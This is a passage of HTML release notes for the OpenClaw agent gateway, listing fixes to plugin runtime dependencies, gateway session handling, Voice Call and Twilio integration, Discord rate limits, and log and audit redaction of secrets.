<p>Plugins/runtime-deps: prune inactive same-package versioned runtime-deps roots after bundled dependency repair, so upgrades do not leave old <code>openclaw-&lt;version&gt;-&lt;hash&gt;</code> package caches behind after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune legacy version-scoped plugin runtime-deps roots during bundled dependency repair and cover the path in Package Acceptance's upgrade-survivor matrix, so upgrades from 2026.4.x no longer leave stale per-plugin runtime trees after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep Gateway startup plugin imports and runtime plugin fallback loads verify-only after startup/config repair planning, so packaged installs no longer spawn package-manager repair from hot paths after readiness. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @brokemac79 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat package.json runtime-deps manifests as supersets when generated materialization metadata is absent, so bundled plugin activation stops restaging already-installed dependency subsets on every activation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362879118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75429" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75429/hovercard" href="https://github.com/openclaw/openclaw/issues/75429">#75429</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75431/hovercard" href="https://github.com/openclaw/openclaw/pull/75431">#75431</a>) Thanks @loyur.</p>
</li>
<li>
<p>iMessage: add stdin write callback and error listener to IMessageRpcClient so async EPIPE from a closed child process rejects the pending request instead of crashing the gateway with uncaughtException. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>MCP/stdio: settle MCP stdio transport send() from the write callback instead of resolving immediately on buffer acceptance, so async write errors reject the promise instead of being lost. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Process/exec: add stdin error listener in runCommandWithTimeout so EPIPE from a prematurely-exited child is swallowed instead of escaping to uncaughtException. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Voice Call/realtime: add default-off fast memory/session context for <code>openclaw_agent_consult</code>, giving live calls a bounded answer-or-miss path before the full agent consult. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329662019" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71849/hovercard" href="https://github.com/openclaw/openclaw/issues/71849">#71849</a>. Thanks @amzzzzzzz.</p>
</li>
<li>
<p>Google Meet: interrupt Realtime provider output when local barge-in clears playback, so command-pair audio stops model speech instead of only restarting Chrome playback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346767837" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73850/hovercard" href="https://github.com/openclaw/openclaw/issues/73850">#73850</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346567653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73834" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73834/hovercard" href="https://github.com/openclaw/openclaw/pull/73834">#73834</a>) Thanks @shhtheonlyperson.</p>
</li>
<li>
<p>Gateway/config: cap oversized plugin-owned schemas in the full <code>config.schema</code> response so large installed plugin sets cannot balloon Gateway RSS or crash schema clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/update: skip ClawHub and marketplace plugin updates when the bundled version is newer than the recorded installed version, so <code>openclaw update</code> no longer overwrites working bundled plugins with older external packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363046993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75447/hovercard" href="https://github.com/openclaw/openclaw/issues/75447">#75447</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: use bounded tail reads for sessions-list transcript usage fallbacks and cap bulk title/last-message hydration, keeping large session stores responsive when rows request derived previews. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: yield during bulk transcript title/preview hydration and copy compaction checkpoints asynchronously, keeping the Gateway event loop responsive for large session stores and large transcripts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362222686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75330/hovercard" href="https://github.com/openclaw/openclaw/issues/75330">#75330</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362708402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75414/hovercard" href="https://github.com/openclaw/openclaw/issues/75414">#75414</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: stream bounded transcript reads for session detail, history, artifacts, compaction, and send/subscribe sequence paths so small Gateway requests no longer materialize large transcripts or OOM on oversized session logs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/chat: bound chat-history transcript reads to the requested display window so large session logs no longer OOM the Gateway when clients ask for a small history page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>BlueBubbles: detect audio attachments by Apple UTIs (<code>public.audio</code>, <code>public.mpeg-4-audio</code>, <code>com.apple.m4a-audio</code>, <code>com.apple.coreaudio-format</code>) in addition to <code>audio/*</code> MIME, so iMessage voice notes whose webhook payload only carries the UTI are now classified as audio in the inbound <code>&lt;media:audio&gt;</code> placeholder instead of falling through to the generic <code>&lt;media:attachment&gt;</code> tag. Thanks @omarshahine.</p>
</li>
<li>
<p>Voice Call/Twilio: honor stored pre-connect TwiML before realtime webhook shortcuts and reject DTMF sequences outside conversation mode, so Meet PIN entry cannot be skipped or silently dropped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Docs/sandboxing: clarify that sandbox setup scripts (<code>sandbox-setup.sh</code>, <code>sandbox-common-setup.sh</code>, <code>sandbox-browser-setup.sh</code>) are only available from a source checkout, and add inline <code>docker build</code> commands for npm-installed users so sandbox image setup works without cloning the repo. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363242333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75485/hovercard" href="https://github.com/openclaw/openclaw/issues/75485">#75485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: play Twilio Meet DTMF before opening the realtime media stream and carry the intro as the initial Voice Call message, so the greeting is generated after Meet admits the phone participant instead of racing a live-call TwiML update. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: make Twilio setup preflight honor explicit <code>--transport twilio</code> and fail local/private Voice Call webhook URLs, including IPv6 loopback and unique-local forms, before joins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: retry transient 21220 live-call TwiML updates and catch answered-path initial-greeting failures, so a fast answered callback no longer crashes the Gateway or drops the Twilio greeting/listen transition. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353522708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74606/hovercard" href="https://github.com/openclaw/openclaw/pull/74606">#74606</a>) Thanks @Sivan22.</p>
</li>
<li>
<p>CLI/startup: preserve <code>OPENCLAW_HIDE_BANNER</code> banner suppression for route-first startup callers that rely on the default process environment while keeping read-only status/channel paths from repairing bundled plugin runtime dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: register accepted media streams immediately but wait for realtime transcription readiness before speaking the initial greeting, so reconnect grace handling stays live while OpenAI STT startup is no longer starved by TTS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360162005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75197/hovercard" href="https://github.com/openclaw/openclaw/issues/75197">#75197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361111739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75257" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75257/hovercard" href="https://github.com/openclaw/openclaw/pull/75257">#75257</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call CLI: run gateway-delegated <code>voicecall continue</code> through operation-id polling and protocol-shaped errors, so long conversational turns keep their transcript result without blocking a single Gateway RPC. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363097375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75459/hovercard" href="https://github.com/openclaw/openclaw/pull/75459">#75459</a>) Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call CLI: delegate operational <code>voicecall</code> commands to the running Gateway runtime and skip webhook startup during CLI-only plugin loading, preventing webhook port conflicts and <code>setup --json</code> hangs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331824729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72345" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72345/hovercard" href="https://github.com/openclaw/openclaw/issues/72345">#72345</a>. Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Agents/pi-embedded-runner: extract the <code>abortable</code> provider-call wrapper from <code>runEmbeddedAttempt</code> to module scope so its promise handlers no longer close over the run lexical context, releasing transcripts, tool buffers, and subscription callbacks when a provider call hangs past abort. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348625606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74182/hovercard" href="https://github.com/openclaw/openclaw/issues/74182">#74182</a>) Thanks @cjboy007.</p>
</li>
<li>
<p>Docker: restore <code>python3</code> in the gateway runtime image after the slim-runtime switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357583202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75041" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75041/hovercard" href="https://github.com/openclaw/openclaw/issues/75041">#75041</a>.</p>
</li>
<li>
<p>Agents/session-repair: fix resumed sessions failing with repeated 400 errors on Anthropic and strict OpenAI-compatible providers (Qwen, mlx-vlm) after an interrupted conversation or blank user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361379280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75271/hovercard" href="https://github.com/openclaw/openclaw/issues/75271">#75271</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362043132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75313" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75313/hovercard" href="https://github.com/openclaw/openclaw/issues/75313">#75313</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>CLI/Voice Call: scope <code>voicecall</code> command activation to the Voice Call plugin so setup and smoke checks no longer broad-load unrelated plugin runtimes or hang after printing JSON. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/plugins: warn when restrictive <code>plugins.allow</code> is paired with wildcard or plugin-owned tool allowlists, making the exclusive plugin allowlist behavior visible before users hit empty callable-tool runs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174851981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58009/hovercard" href="https://github.com/openclaw/openclaw/issues/58009">#58009</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245604493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64982/hovercard" href="https://github.com/openclaw/openclaw/issues/64982">#64982</a>. Thanks @KR-Python and @BKF-Gitty.</p>
</li>
<li>
<p>Google Meet/Voice Call: keep Twilio Meet joins in conversation mode and reuse the realtime intro prompt when no voice-call-specific intro is configured, so answered phone bridge calls speak instead of joining silently. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Auto-reply/group chats: keep the <code>message</code> tool available for message-tool-only visible replies and apply group-scoped tool policy before deciding fallback delivery, so Discord/Slack-style rooms reply visibly in the correct channel after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355291678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74842/hovercard" href="https://github.com/openclaw/openclaw/issues/74842">#74842</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360452638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75207/hovercard" href="https://github.com/openclaw/openclaw/issues/75207">#75207</a>. Thanks @davelutztx and @aa-on-ai.</p>
</li>
<li>
<p>Agents/commitments: keep inferred follow-ups internal when heartbeat target is none, strip raw source text from stored commitments, disable tools during due-commitment heartbeat turns, bound hidden extraction queue growth, expire stale commitments, and add QA/Docker safety coverage. Thanks @vignesh07.</p>
</li>
<li>
<p>Telegram/agents: keep typing indicators and optional generation tools off the reply critical path, so fresh Telegram replies no longer stall while provider catalogs and media models load. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362421293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75360/hovercard" href="https://github.com/openclaw/openclaw/pull/75360">#75360</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/commitments: run hidden follow-up extraction on the configured agent/default model instead of falling back to direct OpenAI, so OpenAI Codex OAuth-only gateways no longer spam background API-key failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362274024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75334" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75334/hovercard" href="https://github.com/openclaw/openclaw/issues/75334">#75334</a>. Thanks @sene1337.</p>
</li>
<li>
<p>Agents/media: keep async music generation completions on the requester-session wake path even when direct-send completion is enabled, so finished audio stays agent-mediated while video can still opt into direct channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362275213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75335/hovercard" href="https://github.com/openclaw/openclaw/pull/75335">#75335</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Security/config-audit: redact CLI argv and execArgv secrets before persisting config audit records, covering write, observe, and recovery paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204612186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60826/hovercard" href="https://github.com/openclaw/openclaw/issues/60826">#60826</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/models: keep default and configured model-list views responsive when provider catalog discovery stalls, without hiding real catalog load failures, while <code>--all</code> still waits for the exact full catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351397259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74404/hovercard" href="https://github.com/openclaw/openclaw/issues/74404">#74404</a>. Thanks @lisandromachado and @najef1979-code.</p>
</li>
<li>
<p>Plugins/runtime-deps: accept already materialized package-level runtime-deps supersets as converged, so later lazy plugin activation no longer prunes and relaunches <code>pnpm install</code> after gateway startup pre-staging, reducing event-loop pressure from repeated runtime-deps repair on packaged installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks @brokemac79, @lisandromachado, and @midhunmonachan.</p>
</li>
<li>
<p>Plugins/runtime-deps: remove OpenClaw-owned legacy runtime-deps symlinks before replacing staged bundled plugin dependencies, so updates can recover from older symlinked installs instead of failing the symlink safety guard. Thanks @goldmar.</p>
</li>
<li>
<p>Discord: retry queued REST 429s against learned bucket/global cooldowns and reacquire fresh voice upload URLs after CDN upload rate limits, so outbound sends recover without reusing stale single-use upload URLs. Thanks @discord.</p>
</li>
<li>
<p>TTS/providers: keep bundled speech-provider compat fallback available when plugins are globally disabled, so cold gateway and CLI startup can still resolve fallback speech providers instead of leaving explicit TTS provider selection with no registered providers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361272168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75265" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75265/hovercard" href="https://github.com/openclaw/openclaw/pull/75265">#75265</a>. Thanks @sliekens.</p>
</li>
<li>
<p>Discord: collapse repeated native slash-command deploy rate-limit startup logs into one non-fatal warning while keeping per-request REST timing in verbose output. Thanks @discord.</p>
</li>
<li>
<p>Discord: report native slash-command deploy aborts as REST timeouts with method, path, timeout budget, and observed duration, so startup logs explain slow Discord API calls instead of showing a generic aborted operation. Thanks @discord.</p>
</li>
<li>
<p>Security/logging: redact payment credential field names such as card number, CVC/CVV, shared payment token, and payment credential across default log and tool-payload redaction patterns so wallet-style MCP tools do not expose raw payment credentials in UI events or transcripts. Thanks @stainlu.</p>
</li>
<li>
<p>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks @keshavbotagent.</p>
</li>
<li>
<p>Plugins/runtime-deps: materialize newly required bundled plugin packages after local <code>openclaw onboard</code> and <code>openclaw configure</code> config writes, while keeping remote setup read-only, so first Gateway startup no longer discovers missing channel/provider deps after setup claimed success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @scottgl9 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: expire stale legacy install locks whose live PID cannot be tied to the current process incarnation, so Docker PID reuse no longer leaves bundled dependency repair stuck behind old <code>.openclaw-runtime-deps.lock</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356320468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74948/hovercard" href="https://github.com/openclaw/openclaw/issues/74948">#74948</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356328081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74950" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74950/hovercard" href="https://github.com/openclaw/openclaw/pull/74950">#74950</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. Thanks @dchekmarev.</p>
</li>
<li>
<p>Plugins/runtime-deps: recover interrupted bundled runtime-dependency installs whose package sentinels exist but generated materialization is incomplete, forcing npm/pnpm repair in Gateway startup, doctor, and lazy plugin loads instead of leaving channels crash-looping on missing packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361991170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75310/hovercard" href="https://github.com/openclaw/openclaw/pull/75310">#75310</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361740220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75296/hovercard" href="https://github.com/openclaw/openclaw/issues/75296">#75296</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361883653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75304/hovercard" href="https://github.com/openclaw/openclaw/issues/75304">#75304</a>. Thanks @scottgl9.</p>
</li>
<li>
